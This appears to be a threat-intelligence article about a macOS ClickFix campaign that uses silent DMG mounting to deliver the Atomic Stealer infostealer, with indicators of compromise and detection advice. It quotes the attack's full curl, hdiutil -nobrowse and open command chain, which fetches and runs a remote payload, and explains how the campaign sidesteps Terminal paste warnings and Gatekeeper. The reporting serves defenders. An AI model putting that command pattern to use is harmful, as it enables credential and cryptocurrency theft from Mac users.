macOS ClickFix Gains Silent DMG Mount to Push AMOS Stealer

The ClickFix social engineering technique keeps evolving on macOS. Palo Alto Networks Unit 42 has identified a campaign that silently mounts malicious disk images without displaying them in Finder—making it nearly impossible for victims to notice anything happened before Atomic Stealer harvests their credentials.

The attack chains a fake CAPTCHA prompt with a Terminal command that downloads, mounts, and executes malware in a single operation. No Finder window, no visible DMG icon on the desktop. The disk image appears, deploys its payload, and the user remains unaware.

How Silent DMG Mounting Works

Traditional macOS malware delivery requires victims to manually open downloaded disk images. The new technique automates the entire process through a single Terminal command:

curl -fsSL [malicious URL] -o /tmp/s.01M0td.dmg && \
hdiutil attach -nobrowse /tmp/s.01M0td.dmg && \
open $(find /Volumes -maxdepth 3 -name "*.app" | head -1)

Breaking this down:

1. curl -fsSL downloads the DMG silently (no progress bar, no output)
2. hdiutil attach -nobrowse mounts the disk image without adding it to Finder's sidebar or showing it on the desktop
3. find + open locates and launches any .app or .pkg within three directory levels

The -nobrowse flag is the key innovation. Normally when you mount a DMG on macOS, it appears in Finder's sidebar and may open automatically. This flag suppresses all visual indicators. The volume still mounts at /Volumes/, but users won't see it unless they specifically navigate there.

AMOS Payload Targets Everything

The campaign delivers Atomic macOS Stealer (AMOS), which accounted for nearly 40% of Sophos's macOS protection updates last year. Once executed, the self-signed NNApp.app bundle targets:

Browsers (8 Chromium variants + Firefox derivatives):

• Chrome, Edge, Brave, Opera, Arc, Vivaldi, CocCoc, Yandex
• LibreWolf, Tor Browser, Waterfox, Zen

Cryptocurrency wallets:

• Exodus, Electrum, Atomic Wallet, Bitcoin Core
• 7 additional wallet applications

System data:

• Apple Keychain
• Safari passwords and cookies
• Telegram Desktop sessions
• Discord tokens
• Apple Notes
• PDF, TXT, and RTF documents from common directories

The breadth of targeting explains why AMOS remains the dominant macOS infostealer. Similar to the Torg Grabber campaign that targeted over 700 crypto wallets, a single successful infection can compromise banking credentials, cryptocurrency holdings, two-factor authentication tokens, and personal documents in one sweep.

Bypassing macOS Protections

Apple introduced Terminal paste scanning in macOS 26.4 specifically to combat ClickFix attacks. When users paste suspicious commands into Terminal, the system now warns them before execution. Attackers responded by pivoting to Script Editor, using applescript:// URLs to bypass Terminal entirely.

This latest campaign takes yet another path. By keeping the attack within Terminal but automating everything in a single command, attackers hope victims will copy-paste before the warning can register. The command executes quickly—download, mount, and launch happen within seconds of pasting.

The self-signed NNApp.app bundle also lacks Apple notarization, but macOS only blocks unsigned apps when users manually double-click them. Launching via the open command from Terminal sidesteps Gatekeeper's quarantine check under certain configurations.

Part of a Broader ClickFix Ecosystem

This silent mounting technique joins a growing arsenal of ClickFix delivery mechanisms. Unit 42 previously documented IUAM ClickFix Generator, a web-based tool that automates the creation of deceptive phishing pages for low-skilled attackers.

The ClickFix approach has proven remarkably adaptable. We've seen it used to deploy Vidar through compromised WordPress sites, target crypto developers through OpenClaw AI agent platforms, and even mimic enterprise browser crashes to appear legitimate.

Microsoft has also warned about the cross-platform expansion of infostealers like AMOS, noting that attackers are increasingly targeting macOS as enterprises adopt Apple hardware.

Indicators of Compromise

Type	Value
Domain	svs-verificationdate[.]beer
IP Address	196.251.107[.]171
DMG Filename	s.01M0td.dmg
App Bundle	NNApp.app (self-signed)

Organizations should monitor for:

• Outbound connections to the listed IOCs
• hdiutil attach commands with -nobrowse flag from browser-spawned Terminal sessions
• Unsigned .app bundles executing from /Volumes/ paths
• Rapid succession of curl, hdiutil, and open commands

Protection Measures

For individual Mac users:

The core defense hasn't changed: never paste commands from websites into Terminal. No legitimate service requires this. If a site claims you need to run a Terminal command to fix a problem, verify, or download—close it. Period.

Keep macOS updated. While the 26.4 paste scanning can be bypassed, it still provides friction that may give you time to recognize something is wrong.

For enterprise security teams:

Consider blocking the hdiutil attach -nobrowse flag combination via endpoint detection rules. There are few legitimate use cases for mounting invisible disk images.

Monitor for unusual Terminal spawning patterns, particularly when the parent process is a browser. Users don't normally paste complex shell pipelines from websites.

EDR tools can detect Atomic Stealer's behavioral patterns: rapid enumeration of browser profiles, Keychain access attempts, and cryptocurrency wallet file reads happening in sequence. The MacSync stealer campaign demonstrated similar detection opportunities through its aggressive credential harvesting behavior.

The Cat-and-Mouse Continues

Apple blocks one execution path, attackers find another. This has been the pattern throughout 2026. Terminal paste scanning led to Script Editor abuse. Script Editor scrutiny may lead to yet another vector—perhaps osascript, Automator workflows, or something else entirely.

The underlying vulnerability isn't technical. It's the willingness of users to follow instructions from untrusted sources. Until that changes, ClickFix will remain effective regardless of which macOS utility attackers abuse next.